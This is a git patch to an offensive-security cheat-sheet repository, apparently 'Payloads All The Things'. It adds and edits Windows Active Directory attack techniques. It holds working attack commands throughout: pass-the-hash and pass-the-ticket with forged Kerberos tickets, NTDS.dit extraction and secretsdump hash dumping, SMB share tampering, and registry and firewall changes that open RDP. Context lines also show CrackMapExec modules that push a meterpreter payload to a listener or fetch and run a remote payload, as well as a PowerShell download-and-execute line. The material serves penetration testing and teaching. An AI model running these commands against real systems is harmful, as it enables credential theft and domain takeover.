From cdc3adee516c9a5d46b48c9885c799ec9d318479 Mon Sep 17 00:00:00 2001 From: Swissky Date: Sun, 8 Jul 2018 20:03:40 +0200 Subject: [PATCH] PassTheTicket + OpenShare + Tools(CME example) --- .../Active Directory Attack.md | 83 ++++++++++++++++--- .../Windows - Persistence.md | 1 + .../Windows - Privilege Escalation.md | 17 ++-- .../Windows - Using credentials.md | 16 +++- README.md | 2 +- 5 files changed, 98 insertions(+), 21 deletions(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 0bb8e28..8adc216 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -4,10 +4,12 @@ * [Tools](#tools) * [Most common paths to AD compromise](#most-common-paths-to-ad-compromise) * [MS14-068 (Microsoft Kerberos Checksum Validation Vulnerability)](#ms14-068-microsoft-kerberos-checksum-validation-vulnerability) + * [Open Shares](#open-shares) * [GPO - Pivoting with Local Admin & Passwords in SYSVOL](#gpo---pivoting-with-local-admin--passwords-in-sysvol) * [Dumping AD Domain Credentials ](#dumping-ad-domain-credentials-systemrootntdsntdsdit) - * [Golden Tickets](#golden-tickets) - * [Silver Tickets](#silver-tickets) + * [Password in AD User comment](#password-in-ad-user-comment) + * [Golden Tickets](#passtheticket-golden-tickets) + * [Silver Tickets](#passtheticket-silver-tickets) * [Trust Tickets](#trust-tickets) * [Kerberoast](#kerberoast) * [Pass-the-Hash](#pass-the-hash) @@ -33,6 +35,7 @@ git clone --recursive https://github.com/byt3bl33d3r/CrackMapExec crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f --shares crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M metinject -o LHOST=192.168.1.63 LPORT=4443 crackmapexec 192.168.1.100 -u Jaddmon -H ":5858d47a41e40b40f294b3100bea611f" -M web_delivery -o URL="https://IP:PORT/posh-payload" +crackmapexec 192.168.1.100 -u Jaddmon -H ":5858d47a41e40b40f294b3100bea611f" --exec-method smbexec -X 'whoami' ``` * [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon) ```powershell @@ -55,6 +58,20 @@ python ./ms14-068.py -u darthsidious@lab.adsecurity.org -p TheEmperor99! -s S-1- mimikatz.exe "kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache" ``` +## Open Shares +```powershell +pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //192.168.10.100/Share +ls # list files +cd +get # download files +put # replace a file +``` + +Mount a share +```powershell +smbmount //X.X.X.X/c$ /mnt/remote/ -o username=user,password=pass,rw +``` + ### GPO - Pivoting with Local Admin & Passwords in SYSVOL :triangular_flag_on_post: GPO Priorization : Organization Unit > Domain > Site > Local @@ -106,6 +123,21 @@ vssadmin create shadow /for=C : Copy Shadow_Copy_Volume_Name\windows\ntds\ntds.dit c:\ntds.dit ``` +You can also use the Nishang script, available at : [https://github.com/samratashok/nishang](https://github.com/samratashok/nishang) +```powershell +Import-Module .\Copy-VSS.ps1 +Copy-VSS +Copy-VSS -DestinationDir C:\ShadowCopy\ +``` + +**Using vssadmin** +```powershell +vssadmin create shadow /for=C: +copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\ShadowCopy +copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\ShadowCopy +``` + + **Using DiskShadow (a Windows signed binary)** ```powershell diskshadow.txt contains : @@ -118,6 +150,7 @@ delete shadows volume %someAlias% reset then: +NOTE - must be executed from C:\Windows\System32 diskshadow.exe /s c:\diskshadow.txt dir c:\exfil reg.exe save hklm\system c:\exfil\system.bak @@ -126,11 +159,12 @@ reg.exe save hklm\system c:\exfil\system.bak **Extract hashes from ntds.dit** then you need to use secretsdump to extract the hashes ```c -secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL +secretsdump.py -system /root/SYSTEM -ntds /root/ntds.dit LOCAL ``` secretsdump also works remotely ```c -./secretsdump.py IP administrator@domain -use-vss +./secretsdump.py -dc-ip IP AD\administrator@domain -use-vss +./secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:0f49aab58dd8fb314e268c4c6a65dfc9 -just-dc PENTESTLAB/dc\$@10.0.0.1 ``` @@ -150,7 +184,7 @@ CrackMapExec module cme smb 10.10.0.202 -u username -p password --ntds vss ``` -## Password in AD User comment +### Password in AD User comment ```powershell enum4linux | grep -i desc There are 3-4 fields that seem to be common in most AD schemas: @@ -158,7 +192,7 @@ UserPassword, UnixUserPassword, unicodePwd and msSFU30Password. ``` -### Golden Tickets +### PassTheTicket Golden Tickets Forge a TGT, require krbtgt key Mimikatz version @@ -187,11 +221,36 @@ kerberos_ticket_use /root/Downloads/pentestlabuser.tck kerberos_ticket_list ``` -### Silver Tickets -Forge a TGS, require machine accound password (key) from the KDC +Using a ticket on Linux +```powershell +Convert the ticket kirbi to ccache with kekeo +misc::convert ccache ticket.kirbi + +Alternatively you can use ticketer from Impacket +./ticketer.py -nthash a577fcf16cfef780a2ceb343ec39a0d9 -domain-sid S-1-5-21-2972629792-1506071460-1188933728 -domain amity.local mbrody-da + +export KRB5CCNAME=/home/user/ticket.ccache +cat $KRB5CCNAME + + +NOTE: You may need to comment the proxy_dns setting in the proxychains configuration file +./psexec.py -k -no-pass --dc-ip 192.168.1.1 AD/administrator@192.168.1.100 +``` + +### PassTheTicket Silver Tickets +Forging a TGS require machine accound password (key) from the KDC +```powershell +Create a ticket for the service +kerberos::golden /user:USERNAME /domain:DOMAIN.FQDN /sid:DOMAIN-SID /target:TARGET-HOST.DOMAIN.FQDN /rc4:TARGET-MACHINE-NT-HASH /service:SERVICE + +Then use the same steps as a Golden ticket +misc::convert ccache ticket.kirbi +export KRB5CCNAME=/home/user/ticket.ccache +./psexec.py -k -no-pass --dc-ip 192.168.1.1 AD/administrator@192.168.1.100 +``` ### Trust Tickets - +TODO ### Kerberoast ```c @@ -275,6 +334,7 @@ Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -n ### PrivEsc Local Admin - MS16-032 - Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64) +Check if the patch is installed : `wmic qfe list | find "3139914"` ``` Powershell: https://www.exploit-db.com/exploits/39719/ @@ -314,5 +374,6 @@ net group "Domain Admins" hacker2 /add /domain * [Pen Testing Active Directory Environments - Part V: Admins and Graphs](https://blog.varonis.com/pen-testing-active-directory-v-admins-graphs/) * [Pen Testing Active Directory Environments - Part VI: The Final Case](https://blog.varonis.com/pen-testing-active-directory-part-vi-final-case/) * [Passing the hash with native RDP client (mstsc.exe)](https://michael-eder.net/post/2018/native_rdp_pass_the_hash/) - *[Fun with LDAP, Kerberos (and MSRPC) in AD Environments](https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments) - * [DiskShadow The return of VSS Evasion Persistence and AD DB extraction](https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/) \ No newline at end of file + * [Fun with LDAP, Kerberos (and MSRPC) in AD Environments](https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments) + * [DiskShadow The return of VSS Evasion Persistence and AD DB extraction](https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/) + * [How To Pass the Ticket Through SSH Tunnels - bluescreenofjeff](https://bluescreenofjeff.com/2017-05-23-how-to-pass-the-ticket-through-ssh-tunnels/) \ No newline at end of file diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md index 4607457..afaed15 100644 --- a/Methodology and Resources/Windows - Persistence.md +++ b/Methodology and Resources/Windows - Persistence.md @@ -56,3 +56,4 @@ PS C:\> Register-ScheduledTask Backdoor -InputObject $D ## Thanks to * [A view of persistence - Rastamouse](https://rastamouse.me/2018/03/a-view-of-persistence/) + * [Windows Persistence Commands - Pwn Wiki](http://pwnwiki.io/#!persistence/windows/index.md) \ No newline at end of file diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index 2b14481..7055654 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -92,28 +92,29 @@ net share ## Looting for passwords -Search for file contents +### Search for file contents** ```powershell cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt ``` -Search for a file with a certain filename +### Search for a file with a certain filename ```powershell dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config* ``` -Search the registry for key names +### Search the registry for key names ```powershell REG QUERY HKLM /F "password" /t REG_SZ /S /K REG QUERY HKCU /F "password" /t REG_SZ /S /K ``` -Read a value of a certain sub key +### Read a value of a certain sub key ```powershell REG QUERY "HKLM\Software\Microsoft\FTH" /V RuleList ``` -Password in unattend.xml +### Password in unattend.xml +Location of the unattend.xml files ```powershell C:\unattend.xml C:\Windows\Panther\Unattend.xml @@ -121,6 +122,8 @@ C:\Windows\Panther\Unattend\Unattend.xml C:\Windows\system32\sysprep.inf C:\Windows\system32\sysprep\sysprep.xml ``` + +Example content ```powershell @@ -182,4 +185,6 @@ powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadS ## Thanks to * [The Open Source Windows Privilege Escalation Cheat Sheet by amAK.xyz and @xxByte](https://addaxsoft.com/wpecs/) * [Basic Linux Privilege Escalation](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/) -* [Windows Privilege Escalation Fundamentals](http://www.fuzzysecurity.com/tutorials/16.html) \ No newline at end of file +* [Windows Privilege Escalation Fundamentals](http://www.fuzzysecurity.com/tutorials/16.html) +* [TOP–10 ways to boost your privileges in Windows systems - hackmag](https://hackmag.com/security/elevating-privileges-to-administrative-and-further/) +* [The SYSTEM Challenge](https://decoder.cloud/2017/02/21/the-system-challenge/) \ No newline at end of file diff --git a/Methodology and Resources/Windows - Using credentials.md b/Methodology and Resources/Windows - Using credentials.md index 2809511..37894ff 100644 --- a/Methodology and Resources/Windows - Using credentials.md +++ b/Methodology and Resources/Windows - Using credentials.md @@ -68,16 +68,20 @@ python wmiexec.py CSCOU/jarrieta:nastyCutt3r@10.9.122.5 ``` ## RDP Remote Desktop Protocol (Impacket) -``` +```powershell python rdpcheck.py CSCOU/jarrieta:nastyCutt3r@10.9.122.5 rdesktop -d CSCOU -u jarrieta -p nastyCutt3r 10.9.122.5 ``` + Note: you may need to enable it with the following command -``` +```powershell reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0x00000000 /f +netsh firewall set service remoteadmin enable +netsh firewall set service remotedesktop enable ``` + or with psexec(sysinternals) -``` +```powershell psexec \\machinename reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0 ``` @@ -86,6 +90,12 @@ For Server 2012 R2, Win8.1+ xfreerdp /u:offsec /d:win2012 /pth:88a405e17c0aa5debbc9b5679753939d /v:192.168.1.12 ``` +with Metasploit +```powershell +run getgui -u admin -p 1234 +``` + + ## Netuse (Windows) ``` net use \\ordws01.cscou.lab /user:CSCOU\jarrieta nastyCutt3r diff --git a/README.md b/README.md index 60b2e6c..405737a 100644 --- a/README.md +++ b/README.md @@ -1,7 +1,7 @@ # Payloads All The Things A list of useful payloads and bypasses for Web Application Security. Feel free to improve with your payloads and techniques ! -I <3 pull requests :) You can also contribute with a beer IRL or a [![Coffee](https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png)](https://buymeacoff.ee/swissky) +I <3 pull requests :) You can also contribute with a beer IRL or [![Coffee](https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png)](https://buymeacoff.ee/swissky) Every section contains: - README.md - vulnerability description and how to exploit it